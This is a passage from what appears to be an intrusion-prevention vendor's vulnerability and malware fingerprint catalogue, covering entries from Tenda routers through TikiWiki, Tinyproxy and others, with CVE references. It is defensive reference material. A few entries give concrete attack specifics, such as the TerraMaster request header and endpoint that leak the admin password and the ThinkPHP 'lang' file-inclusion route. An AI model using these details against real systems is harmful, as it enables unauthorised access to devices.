
Tenda-AC18-Remote-Code-Execution-CVE-2022-31446

About this vulnerability: A vulnerability in Tenda AC18
Risk: High
First detected in: sgpkg-ips-1510-5242
Last changed: sgpkg-ips-1510-5242
Platform: Generic
Software: Tenda
Type: Input Validation
Description: An unauthenticated remote code execution vulnerability has been reported in the web server component of Tenda AC18 routers.
Situation: HTTP_CRL-Tenda-AC18-Remote-Code-Execution-CVE-2022-31446
References:
CVE-2022-31446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31446
Back to top

Tenda-AX3-Command-Injection-CVE-2023-27240

About this vulnerability: A vulnerability in Tenda AX3 routers
Risk: High
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: Tenda
Type: Input Validation
Description: A command injection vulnerability has been reported in Tenda AX3 router firmware version V16.03.12.11. An unauthenticated attacker could use this vulnerability to execute arbitrary commands.
Situation: HTTP_CS-Tenda-AX3-Command-Injection-CVE-2023-27240
References:
CVE-2023-27240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27240
Back to top

Tenda-ONT-GPON-AC1200-HG9-Command-Injection-CVE-2022-30023

About this vulnerability: A vulnerability in Tenda ONT GPON AC1200 HG9
Risk: High
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: Tenda
Type: Input Validation
Description: A command injection vulnerability has been reported in Tenda ONT GPON AC1200 HG9 wireless routers. An authenticated attacker could use this vulnerability to execute arbitrary commands.
Situation: HTTP_CRL-Tenda-ONT-GPON-AC1200-HG9-Command-Injection-CVE-2022-30023
References:
CVE-2022-30023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30023
Back to top

Teredo-Tunneling-Protocol

About this vulnerability: Teredo IPv6 tunneling protocol
Risk: Moderate
First detected in: sgpkg-ips-120-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista
Software: <os>
Type: Insecure Configuration
Description: Teredo is an IPv6 tunneling protocol included in various versions of Microsoft Windows, including Windows Vista where it is enabled by default. Teredo allows tunneling of arbitrary IPv6 traffic over IPv4. While Teredo is not malicious by itself, it may be used to bypass network access controls.
Back to top

TerraMaster-TOS-ajaxdata.php-Multiple-Command-Injections

About this vulnerability: A vulnerability in TerraMaster TOS
Risk: High
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1373-5242
Platform: Generic
Software: TerraMaster TOS
Type: Input Validation
Description: There exists multiple command injection vulnerabilities in ajaxdata.php in TerraMaster TOS 3.1.03. This fingerprint covers CVE-2018-13330, CVE-2018-13336, CVE-2018-13338, CVE-2018-13353, CVE-2018-13358 and CVE-2018-13418.
Situation: HTTP_CRL-TerraMaster-TOS-ajaxdata.php-Multiple-Command-Injections
References:
CVE-2018-13336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13336
Back to top

TerraMaster-TOS-Remote-Command-Execution-Vulnerability-CVE-2022-24990

About this vulnerability: An attempt to exploit a vulnerability in TerraMaster TOS detected
Risk: High
First detected in: sgpkg-ips-1592-5242
Last changed: sgpkg-ips-1624-5242
Platform: Unix; Linux
Software: TerraMaster TOS
Type: Insecure Configuration
Description: TerraMaster OS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending "User-Agent: TNAS" to "module/api.php?mobile/webNasIPS" and then reading the PWD field in the response.
Situation: File-Text_TerraMaster-TOS-Remote-Command-Execution-Vulnerability-CVE-2022-24990
References:
CVE-2022-24990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24990
Back to top

TerraMaster-TOS-Unauthenticated-RCE-CVE-2022-24989

About this vulnerability: An attempt to exploit a vulnerability in TerraMaster TOS detected
Risk: High
First detected in: sgpkg-ips-1624-5242
Last changed: sgpkg-ips-1624-5242
Platform: Unix; Linux
Software: TerraMaster TOS
Type: Insecure Configuration
Description: TerraMaster OS 4.2.29 and earlier allows remote attackers to obtain a REQUESTCODE without authentication and perform OS command injection via the createRaid function.
Situation: HTTP_CRL-TerraMaster-TOS-Unauthenticated-RCE-CVE-2022-24989
References:
CVE-2022-24989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24989
Back to top

TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45837

About this vulnerability: An attempt to exploit a vulnerability TerraMaster TOS detected
Risk: High
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1626-5242
Platform: Unix;Linux
Software: TerraMaster TOS
Type: Input Validation
Description: A vulnerability in TerraMaster TOS, versions 4.2.15 and before, which allows remote attackers to execute arbitrary commands as root by sending a specifically crafted input to vulnerable endpoint `/tos/index.php?app/del`.
Situation: HTTP_CRL-TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45837
References:
CVE-2021-45837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45837
Back to top

TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45839

About this vulnerability: An attempt to exploit a vulnerability TerraMaster TOS detected
Risk: High
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1626-5242
Platform: Unix;Linux
Software: TerraMaster TOS
Type: Insecure Configuration
Description: A vulnerability in TerraMaster TOS, versions 4.2.15 and before, which allows remote attackers to obtain the first administrator's hash set up on the system as well as other information such as MAC address, by performing a request to the `/module/api.php?mobile/webNasIPS` endpoint.
Situation: HTTP_CSU-TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45839
References:
CVE-2021-45839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45839
Back to top

TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45841

About this vulnerability: An attempt to exploit a vulnerability TerraMaster TOS detected
Risk: High
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1626-5242
Platform: Unix;Linux
Software: TerraMaster TOS
Type: Input Validation
Description: A vulnerability in TerraMaster TOS, versions 4.2.15 and before, which allows remote attackers to craft an unauthenticated admin session and obtain sensitive system information.
Situation: HTTP_CRL-TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45841
References:
CVE-2021-45841
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45841
Back to top

TerraMaster_TOS_Remote_Code_Execution_CVE-2020-28188

About this vulnerability: A vulnerability in TerraMaster TOS
Risk: Moderate
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1626-5242
Platform: Generic
Software: TerraMaster TOS
Type: Input Validation
Description: There exists a remote code execution vulnerability in TerraMaster TOS. Successful exploitation could lead in arbitrary code execution on the target server. CVE-2020-28188 and CVE-2020-35665.
Situation: HTTP_CSU-TerraMaster_TOS_Remote_Code_Execution_CVE-2020-28188
References:
CVE-2020-28188
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28188
Back to top

Texas-Imperial-Software-Wftpd-Buffer-Overflow

About this vulnerability: A Texas Imperial Software Wftpd Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WFTPD
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Texas Imperial Software WFTPD serer, version 3.23, which allows remote attackers to execute arbitrary code via a long SIZE command.
Situation: FTP_CS-Texas-Imperial-Software-Wftpd-Buffer-Overflow
References:
CVE-2006-4318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4318
BID-19617
http://www.securityfocus.com/bid/19617
OSVDB-28134
http://www.osvdb.org/28134
Back to top

TFTP-3Com-TFTP-Server-Transporting-Mode-Remote-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in 3Com TFTP Server
Risk: High
First detected in: sgpkg-ips-88-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: 3Com TFTP Server
Type: Buffer Overflow
Description: 3Com TFTP Server has a stack-based buffer overflow vulnerability in the handling of the transfer mode string. By sending a crafted Read or Write request to the vulnerable server, a remote attacker can cause a DoS or execute arbitrary code with the privileges of the service process, normally System.
Situation: TFTP_Trivial-File-Transfer-Protocol-Mode-String-Buffer-Overflow
References:
CVE-2006-6183
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6183
BID-21301
http://www.securityfocus.com/bid/21301
Back to top

TFTP-FutureSoft-TFTP-Server-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in FutureSoft TFTP Server
Risk: High
First detected in: sgpkg-ips-32-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: FutureSoft TFTP Server 2000
Type: Buffer Overflow
Description: FutureSoft TFTP Server 2000 provides a TFTP (Trivial File Transfer Protocol) service on Windows platform. The evaluation version 1.0.0.1 of FutureSoft TFTP Server has a buffer overflow vulnerability in the handling of filename and transfer mode string. Remote attacker can exploit this vulnerability to execute arbitrary code on the victim server.
Situation: TFTP_Read-Or-Write-Request-Excessively-Long-Filename
TFTP_Trivial-File-Transfer-Protocol-Mode-String-Buffer-Overflow
References:
CVE-2005-1812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1812
BID-13821
http://www.securityfocus.com/bid/13821
OSVDB-16954
http://www.osvdb.org/16954
Back to top

TFTP-FutureSoft-TFTP-Server-Directory-Traversal

About this vulnerability: Directory traversal vulnerability in FutureSoft TFTP Server
Risk: Moderate
First detected in: sgpkg-ips-32-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: FutureSoft TFTP Server 2000
Type: Directory Traversal
Description: FutureSoft TFTP Server 2000 provides a TFTP (Trivial File Transfer Protocol) service on Windows platform. The evaluation version 1.0.0.1 of FutureSoft TFTP Server has a directory traversal vulnerability in the handling of requested files. Remote attacker can exploit this vulnerability to read arbitrary files on the victim server.
Situation: TFTP_Trivial-File-Transfer-Protocol-Directory-Traversal
References:
CVE-2005-1813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1813
BID-13821
http://www.securityfocus.com/bid/13821
Back to top

TFTP-Microsoft-RIS-TFTP-Service-Write-Access-Vulnerability

About this vulnerability: RIS TFTP Service allows anonymous remote write access by default
Risk: High
First detected in: sgpkg-ips-87-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft RIS TFTP Server
Type: Insecure Configuration
Description: There is a file overwrite vulnerability in the Microsoft Windows Remote Installation Service. The Remote Installation Service (RIS) includes a TFTP server that is configured by default to allow anonymous users to update and overwrite files. This vulnerability allows an attacker to compromise operating installs offered by the RIS server.
Situation: TFTP_Microsoft-RIS-TFTP-Write-Access
References:
CVE-2006-5584
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5584
BID-21495
http://www.securityfocus.com/bid/21495
MS06-077
http://technet.microsoft.com/security/bulletin/MS06-077
Back to top

TFTP-TFTP-Server-Error-Packet-Handling-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in TFTP Server
Risk: High
First detected in: sgpkg-ips-158-2032
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: TFTP Server SP
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in TFTP Server. By sending a malicious TFTP ERROR packet with an excessively long ErrMsg string, a remote unauthenticated attacker can compromise the vulnerable system.
Situation: TFTP_TFTP-Server-Error-Packet-Handling-Buffer-Overflow
References:
CVE-2008-2161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2161
BID-29111
http://www.securityfocus.com/bid/29111
OSVDB-44904
http://www.osvdb.org/44904
Back to top

TFTP-TFTP-Server-SP-Long-Filename-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in TFTP Server SP
Risk: High
First detected in: sgpkg-ips-151-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: TFTP Server SP
Type: Buffer Overflow
Description: TFTP Server SP has a buffer overflow vulnerability in the handling of excessively long filenames in a TFTP read or write request. A remote attacker can exploit this vulnerability to cause a denial of service or execute arbitrary code on the victim server.
Situation: TFTP_Read-Or-Write-Request-Excessively-Long-Filename
References:
CVE-2008-1611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1611
BID-28462
http://www.securityfocus.com/bid/28462
OSVDB-43785
http://www.osvdb.org/43785
Back to top

TFTP-Usage

About this vulnerability: TFTP usage detection
Risk: Low
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic TFTP server
Type: Remote Control
Description: This vulnerability is referenced by fingerprints that detect TFTP file transfers. TFTP, Trivial File Transfer Protocol, is a simple but widely used file transfer protocol. Because of the simple implementation, many worms and bots use TFTP to distribute their payload after a successful exploit. Unexpected TFTP traffic inside a network may indicate worm propagation.
Situation: Shared-UDP_TFTP-Usage
Back to top

TFTP32d-Format-String-Vulnerbility

About this vulnerability: Format String vulnerability in TFTP32d
Risk: High
First detected in: sgpkg-ips-349-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TFTP32d
Type: Format String
Description: TFTP32d v2.81 ha a format string vulnerability that allows remote code execution.
Situation: TFTP_TFTP32d-Format-String-Vulnerability-Poc
TFTP_TFTP32d-Format-String-Vulnerability
References:
CVE-2006-0328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0328
BID-16333
http://www.securityfocus.com/bid/16333
OSVDB-22661
http://www.osvdb.org/22661
Back to top

Tftpd32-DNS-Server-Buffer-Overflow

About this vulnerability: A vulnerability in Philippe Jounin TFTPD32
Risk: High
First detected in: sgpkg-ips-455-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TFTPD32
Type: Input Validation
Description: A buffer overflow has been reported in Tftpd32's DNS component. The vulnerability is due to an error in processing domain labels. A remote, unauthenticated attacker can exploit this vulnerability by sending a malicious DNS frame to an affected server. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the Tftpd32 server. An unsuccessful attack attempt can result in a denial-of-service condition.
Situation: DNS_Protocol_Violation
References:
OSVDB-82489
http://www.osvdb.org/82489
Back to top

Tftpd32-Long-Filename-Buffer-Overflow

About this vulnerability: A Tftpd32 Long Filename Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: TFTPD32
Type: Buffer Overflow
Description: A buffer overflow vulnerability in TFTPD32, version 2.21, which allows remote attacker to execute arbitrary code via a long filename argument.
Situation: TFTP_Read-Or-Write-Request-Excessively-Long-Filename
References:
CVE-2002-2226
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2226
BID-6199
http://www.securityfocus.com/bid/6199
OSVDB-45903
http://www.osvdb.org/45903
Back to top

TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Data-And-Error-Packet-BOF

About this vulnerability: An attempt to exploit vulnerability in HP Intelligent Management Center detected
Risk: High
First detected in: sgpkg-ips-391-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Intelligent Management Center
Type: Buffer Overflow
Description: A vulnerability has been identified in a component of the HP Intelligent Management Center (tftpserver.exe). When processing DATA or ERROR TFTP packets, user-supplied data is copied into a fixed length buffer, allowing an attacker to overwrite data on the stack.
Situation: TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Data-And-Error-Packet-BOF
References:
CVE-2011-1852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1852
BID-47789
http://www.securityfocus.com/bid/47789
Back to top

TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Mode-RemoteCodeExec

About this vulnerability: An attempt to exploit vulnerability in HP Intelligent Management Center detected
Risk: High
First detected in: sgpkg-ips-391-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Intelligent Management Center
Type: Buffer Overflow
Description: A vulnerability has been identified in a component of the HP Intelligent Management Center (tftpserver.exe). When processing the MODE field, user input is copied to a buffer on the stack without properly checking its length first, allowing an attacker to overwrite data on the stack.
Situation: TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Mode-RemoteCodeExec
References:
CVE-2011-1851
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1851
BID-47789
http://www.securityfocus.com/bid/47789
Back to top

Thanksgiving-iTunes-Malware

About this vulnerability: Thanksgiving iTunes Malware
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Thanksgiving iTunes malware is spread by fake iTunes gift certificates. It can create a backdoor on the infected machine and try to capture user information, such as passwords.
Situation: HTTP_CSU-Thanksgiving-iTunes-Malware
Back to top

ThiefQuest-C2-Traffic

About this vulnerability: ThiefQuest C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1263-5242
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS
Software: <os>
Type: Backdoor
Description: ThiefQuest, also known as EvilQuest, is a macOS malware with data exfiltration, file encryption and keylogging capabilities.
Situation: HTTP_CS-ThiefQuest-C2-Traffic
Back to top

ThinkAdmin-ModuleService.php-checkAllowDownload-Directory-Traversal

About this vulnerability: A vulnerability in ThinkAdmin
Risk: High
First detected in: sgpkg-ips-1292-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ThinkAdmin
Type: Directory Traversal
Description: There exists a vulnerability in ThinkAdmin, versions before 6.0.4, which allows remote attackers to read arbitrary files on the target server by sending a crafted request, due to the insufficient validation on the file paths by function checkAllowDownload() in ModuleService.php script.
Situation: HTTP_CSU_hinkAdmin-ModuleService.php-checkAllowDownload-Directory-Traversal
References:
CVE-2020-25540
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25540
Back to top

ThinkPHP-Local-File-Inclusion-CVE-2022-47945

About this vulnerability: An attempt to exploit a vulnerability in ThinkPHP detected
Risk: High
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Platform: Generic
Software: ThinkPHP
Type: Input Validation
Description: ThinkPHP framework before 6.0.14 allows local file inclusion via the "lang" parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.
Situation: HTTP_CSU-ThinkPHP-Local-File-Inclusion-CVE-2022-47945
HTTP_CSH-ThinkPHP-Local-File-Inclusion-CVE-2022-47945
References:
CVE-2022-47945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47945
Back to top

ThinkPHP-RCE-Vulnerability-CVE-2018-20062

About this vulnerability: A vulnerability in ThinkPHP
Risk: High
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ThinkPHP
Type: Malfunction
Description: There has been reported a remote code execution vulnerability in ThinkPHP. Successful exploitation can lead in remote code execution.
Situation: HTTP_CRL-ThinkPHP-RCE-Vulnerability-CVE-2018-20062
References:
CVE-2018-20062
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20062
Back to top

ThinkPHP-Remote-Code-Execution

About this vulnerability: ThinkPHP Remote Code Execution
Risk: Moderate
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1321-5242
Platform: Generic
Software: ThinkPHP
Type: Malfunction
Description: A command injection vulnerability in ThinkPHP
Situation: HTTP_CS_ThinkPHP-Remote-Code-Execution
References:
CVE-2019-9082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9082
Back to top

ThinVNC-Directory-Traversal

About this vulnerability: A vulnerability in ThinVNC
Risk: High
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1638-5242
Platform: Windows
Software: ThinVNC
Type: Directory Traversal
Description: A vulnerability in ThinVNC, versions 1.0b1 and before, which allows remote attackers to retrieve arbitrary files via directory traversal.
References:
CVE-2019-17662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17662
Back to top

Thomson-TWG850-4-Unauthenticated-Backup-File-Access

About this vulnerability: A vulnerability in Thomson TWG850-4
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Thomson TWG850-4
Type: Malfunction
Description: Thomson TWG850-4 has a vulnerability which allows unauthenticated access to its backup file.
Situation: HTTP_CSU-Thomson-TWG850-4-Unauthenticated-Backup-File-Access
References:
OSVDB-85791
http://www.osvdb.org/85791
Back to top

Tidserv-Bot

About this vulnerability: Tidserv Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Tidserv is a Trojan that opens a backdoor on the infected machine.
Situation: HTTP_CSU-Tidserv-Bot-Traffic
Back to top

Tightvnc-Vncviewer-HandleCoRREBPP-Global-Buffer-Overflow

About this vulnerability: A vulnerability in TightVNC vncviewer
Risk: High
First detected in: sgpkg-ips-1212-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TightVNC
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in TightVNC vncviewer, version 1.3.10, which allows remote attackers to execute arbitrary code on the target user's machine by sending a maliciously crafted FramebufferUpdate message, due to improper handling of FramebufferUpdate messages.
Situation: RFB_SS-Tightvnc-Vncviewer-HandleCoRREBPP-Global-Buffer-Overflow
References:
CVE-2019-8287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8287
Back to top

Tightvnc-Vncviewer-InitialiseRFBConnection-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in TightVNC.
Risk: High
First detected in: sgpkg-ips-1439-5242
Last changed: sgpkg-ips-1439-5242
Platform: Linux;Windows
Software: TightVNC
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability in TightVNC, version 1.3.10, which allows remote attackers to execute arbitrary code by sending a maliciously crafted message to the target user, due to missing integer value validation in InitialiseRFBConnection in rfbproto.c.
Situation: Generic_TCP-Tightvnc-Vncviewer-InitialiseRFBConnection-Heap-Buffer-Overflow
References:
CVE-2022-23967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23967
Back to top

Tightvnc-Vncviewer-Rfbservercuttext-Handler-Integer-Overflow

About this vulnerability: A vulnerability in TightVNC
Risk: Moderate
First detected in: sgpkg-ips-1205-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TightVNC
Type: Integer Overflow
Description: Improper handling of ServerCutText messages sent by a VNC server causes an integer overflow vulnerability in TightVNC viewer. A successful exploit may allow an attacker to execure arbitrary code on the with the privileges of the viewer program.
Situation: RFB_SS-Tightvnc-Vncviewer-Rfbservercuttext-Handler-Integer-Overflow
References:
CVE-2019-15678
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15678
Back to top

Tiki-Wiki-PHP-Code-Execution

About this vulnerability: A Tiki Wiki PHP Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TikiWiki
Type: Input Validation
Description: An input validation vulnerability in Tiki Wiki, versions before 8.4, which allows remote attackers to execute arbitrary PHP code, via a crafted serialized object in the cookieName parameter to lib/banners/bannerlib.php, printpages or printstructures parameters to tiki-print_multi_pages.php or tiki-print_pages.php, or the sendpages sendstructures or sendarticles parameters to tiki-send_objects.php.
Situation: HTTP_CRL-Tiki-Wiki-PHP-Code-Execution
References:
CVE-2012-0911
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911
BID-54298
http://www.securityfocus.com/bid/54298
OSVDB-83534
http://www.osvdb.org/83534
Back to top

TikiWiki-Admin-Authentication-Bypass-CVE-2020-15906

About this vulnerability: An attempt to exploit a vulnerability in TikiWiki detected
Risk: High
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Platform: Generic
Software: TikiWiki
Type: Input Validation
Description: "tiki-login.php" in TikiWiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
Situation: HTTP_CRL-TikiWiki-Admin-Authentication-Bypass-CVE-2020-15906
References:
CVE-2020-15906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15906
Back to top

TikiWiki-Information-Disclosure

About this vulnerability: A TikiWiki Information Disclosure vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TikiWiki
Type: Input Validation
Description: A vulnerability in TikiWiki, version 1.9.5, which allows remote attackers to obtain sensitive information via an empty sort_mode parameter, in multiple php functions, which reveal the information in certain database error messages.
Situation: HTTP_CS-TikiWiki-Information-Disclosure
References:
CVE-2006-5702
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5702
BID-20858
http://www.securityfocus.com/bid/20858
OSVDB-30172
http://www.osvdb.org/30172
Back to top

TikiWiki-Tiki-Graph-Formula-Command-Execution

About this vulnerability: A vulnerability in TikiWiki
Risk: High
First detected in: sgpkg-ips-309-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TikiWiki
Type: Input Validation
Description: There is a vulnerability in TikiWiki. The vulnerability is due to an insufficient input validation in tiki-graph_formula.php, leading to execution of arbitary PHP statements in the context of the web server.
Situation: HTTP_CRL-TikiWiki-Tiki-Graph-Formula-Command-Execution
References:
CVE-2007-5423
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5423
BID-26006
http://www.securityfocus.com/bid/26006
OSVDB-40478
http://www.osvdb.org/40478
Back to top

Timbuktu-Pro-Directory-Traversal

About this vulnerability: A Timbuktu Pro Directory Traversal vulnerability.
Risk: High
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows;Mac OS X
Software: Timbuktu Pro
Type: Directory Traversal
Description: A vulnerability in Timbuktu Pro, version 8.6.5 for Windows and possibly 8.7 for Mac OS X, which allows remote attackers to upload files to arbitrary locations, which can be leveraged for code execution, via a destination filename with a backslash character followed by a dot dot slash sequence.
Situation: Generic_CS-Timbuktu-Pro-Directory-Traversal
References:
CVE-2008-1117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1117
OSVDB-43544
http://www.osvdb.org/43544
Back to top

Tinba-Bot

About this vulnerability: Tinba Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Tinba is a Trojan Bot. It's purpose is to steal banking and credit card information from the infected machine.
Situation: HTTP_CS-Tinba-Bot-Traffic
File-Binary_Tinba-Botnet-Traffic
Back to top

Tinyfilemanager.php-Fullpath-Directory-Traversal

About this vulnerability: A vulnerability in Tiny File Manager Tiny File Manager
Risk: Moderate
First detected in: sgpkg-ips-1451-5242
Last changed: sgpkg-ips-1451-5242
Platform: Generic
Software: Tiny File Manager
Type: Directory Traversal
Description: Insufficient validation of the fullpath parameter during file upload operations causes a directory traversal vulnerability in Tiny File Manager. A successful exploit allows an attacker to upload files to arbitrary paths and execute arbitrary code on the target system.
Situation: HTTP_CS-Tinyfilemanager.php-Fullpath-Directory-Traversal
References:
CVE-2021-45010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45010
Back to top

TinyIdentD-2.2-Stack-Buffer-Overflow

About this vulnerability: TinyIdentD 2.2 Stack Buffer Overflow
Risk: High
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: TinyIdentD
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in TinyIdentD 2.2 which allows attackers to remotly execute arbitrary code via a long string over TCP 113.
Situation: Generic_CS-TinyIdentD-2.2-Stack-Buffer-Overflow
References:
CVE-2007-2711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2711
BID-23981
http://www.securityfocus.com/bid/23981
OSVDB-36053
http://www.osvdb.org/36053
Back to top

TinyNuke-Malware-C2-Traffic

About this vulnerability: TinyNuke malware C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1136-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: TinyNuke, also known as Nuclear Bot, is a banking trojan with web inject and stealer functionalities. It also has a module to support VNC connections.
Situation: HTTP_CS-TinyNuke-Malware-C2-Traffic
Back to top

Tinyproxy-HTTP-Connection-Headers-Use-After-Free

About this vulnerability: An attempt to exploit a vulnerability in Tinyproxy detected
Risk: High
First detected in: sgpkg-ips-1747-5242
Last changed: sgpkg-ips-1747-5242
Platform: Linux
Software: Tinyproxy
Type: Use-after-free
Description: A vulnerability in Tinyproxy, versions prior to 1.11.2, which allows remote attackers to execute arbitrary code or cause a denial of service condition by sending crafted requests or responses, due to a user-after-free when parsing HTTP connection headers.
Situation: HTTP_SHS-Tinyproxy-HTTP-Connection-Headers-Use-After-Free
HTTP_CSH-Tinyproxy-HTTP-Connection-Headers-Use-After-Free
References:
CVE-2023-49606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49606
Back to top

Tinyproxy-HTTP-Connection-Headers-Use-After-Free-CVE-2023-49606

About this vulnerability: An attempt to exploit a vulnerability in Tinyproxy detected
Risk: High
First detected in: sgpkg-ips-1724-5242
Last changed: sgpkg-ips-1724-5242
Platform: Generic
Software: Tinyproxy
Type: Input Validation
Description: A use-after-free vulnerability exists in the HTTP Connection Headers parsing in Tinyproxy 1.11.1 and Tinyproxy 1.10.0. A specially crafted HTTP header can trigger reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution. An attacker needs to make an unauthenticated HTTP request to trigger this vulnerability.
Situation: HTTP_CSH-Tinyproxy-HTTP-Connection-Headers-Use-After-Free-CVE-2023-49606
References:
CVE-2023-49606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49606
Back to top

TIP-Microsoft-Distributed-Transaction-Controller-Primary-Node-DoS

About this vulnerability: Denial of service vulnerability in MSDTC TIP implementation
Risk: Moderate
